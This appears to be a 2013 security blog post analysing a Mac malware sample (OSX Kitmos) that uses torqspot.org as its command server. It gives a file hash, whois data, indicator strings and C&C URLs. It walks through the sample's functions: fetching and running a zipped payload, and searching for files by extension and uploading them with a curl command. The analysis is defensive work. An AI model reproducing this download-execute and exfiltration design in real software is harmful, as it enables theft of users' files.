Friday, May 24, 2013

OSX Kitmos : other binary, other C&C


On May the 20th, Norman has published a report about an Indian cyberattack infrastructure that they call "Hangover" due to information found to the path to a PDB file.
Their blog post also refers to Oslo Freedom Forum attack that I wrote about in my previous article :
"Based on the sample and Command&Control domain mentioned in the F-Secure post, we can say quite conclusively that the Oslo Freedom Forum attack was performed through the same attack infrastructure. We also found another MachO executable apparently written by the same person (same Apple Developer ID), and using another domain in the Hangover infrastructure – torqspot.org."

As this domain was present in another Mach-O binary that I have, I have chose to take a quick look at it.



File informations

SHA1 hash : b6a47d52de64af50a5a1415213e60dc1b076b4e7
File type : Mach-O executable i386
VirusTotal report : https://www.virustotal.com/en/file/a74196018b2854765333a8f798b0ae3f3b71c89ec9632188f07c71d055125cb2/analysis/

C&C information

This sample uses "torqspot.org" as C&C domain name. Whois reveals still fake information :

Domain ID:D168171472-LROR
Domain Name:TORQSPOT.ORG
Created On:16-Mar-2013 05:28:07 UTC
Last Updated On:16-May-2013 03:45:16 UTC
Expiration Date:16-Mar-2014 05:28:07 UTC
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:DI_25590875
Registrant Name:Melissa Leo
Registrant Street1:E-5 cecill street
Registrant Street2:Manchester
Registrant City:Manchester
Registrant State/Province:Manchester(Cityof)
Registrant Postal Code:M14LF
Registrant Country:GB
Registrant Phone:+044.7251868
Registrant Email:leo.melissa@mail.ru

C&C is not responding anymore.

IOC

All logged messages can be used to identify a compromised macintosh. For example, the following messages can be used as IOC :

- "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@"
- "CONTACTS mreslt %@"
- "CONTACTS urlResponse  %d"
- "responseData: %@"
- "http://torqspot.org/App/MacADV/$hostname/$serverResponse"
- "/Applications"
- "End"
- "app path =%@"
- " exec path =%@"
- "file: %@"
- "connected to upload server %@"
- "Fail connected to upload server %@, begin in %d sec"
- "Try zip and upload for failed file, before."
- "ComputerName_UserName : %@"
- "Failed retry %@"
- "Retry %@"
- "New seesion"
- "search path from state.dat"
- "search path from root"
- "available paths: %@"
- "No found folder"
- "No found file"
- "Start searching"
- "%ld files found"

DNS resolution to "torqspot.org" and all kind of HTTP requests to this domain can also be used to identify a compromised computer on a network.

Features

Lots of features and functions (coml, cop, runSystemCommand, ...) are similar to previous binary analyzed. Below, only new and interesting will be detailed.

macurl

- send synchronous HTTP request to "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@" w/ hostname as 1st arg and "no" as 2nd arg
- get data at URL "http://torqspot.org/App/MacADV/$hostname/$serverResponse" w/ dataWithContentsOfURL function, where $serverResponse is the response sent by the server to the previous request
- write downloaded data to file "/Applications/$ServerResponse"
- execute following command :
"/usr/bin/ditto -x -k /Applications/$ServerResponse /Applications/" to extract PKZip archive "/Applications/$ServerResponse" to "/Applications/"
- replace/add ".app" extension to "/Applications/$ServerResponse"
- if path exists, run the executable (NSTask, setLaunchPath, launch)
- create string "http://torqspot.org/App/MacDV/up.php?cname=%@&file=%@&res=%@" w/ arguments : $hostname, $serverResponse and "sucess" (w/ one 'c' :)
- send a request using that string (w/ sendSynchronousRequest:returningResponse:error: method)
- log "file: %@" w/ data answered by the server as argument

initFileBackup

- get bundlePath and add "FileBackup.ini" to it
- use "stringWithContentsOfFile:encoding:error:" function to get content data of config file ("<bundlePath>/FileBackup.ini")
- if file content iss less than 10 characters, go to the end of the function
- extract data between <URL> and </URL> to pass as parameter to setUrl function
- extract data between <EXTENSION> and <EXTENSION> and use it to create an array of strings based on ';' separator
- call setExtArray to initialize an array with extensions stored in "FileBackup.ini" file

before_start_

- get bundlePath and add "state.dat" to it
- if that file exists, read its content and create an array of strings by spliting on "#####" separator. Then use strings in that array as paths
- if the file doesn't exist, path will be set to "/"
- call connectServer/upload of ZipUpload class and run a command similar to this : "/usr/bin/curl -F upload=@ -F pc="

find_

Looking for files based on extension

batch_

Do some stuff and call macurl

deleteState_

Delete file "<bundlePath>/state.dat" if it exists

saveState_

Save a string array to "<bundlePath>/state.dat" by separating strings by "#####". This function is called by find function and the malware terminates.


Refs

https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc
http://www.f-secure.com/weblog/archives/00002554.html
http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/
http://blogs.norman.com/2013/security-research/the-hangover-report
https://www.botnets.fr/index.php/HangOver

No comments:

Post a Comment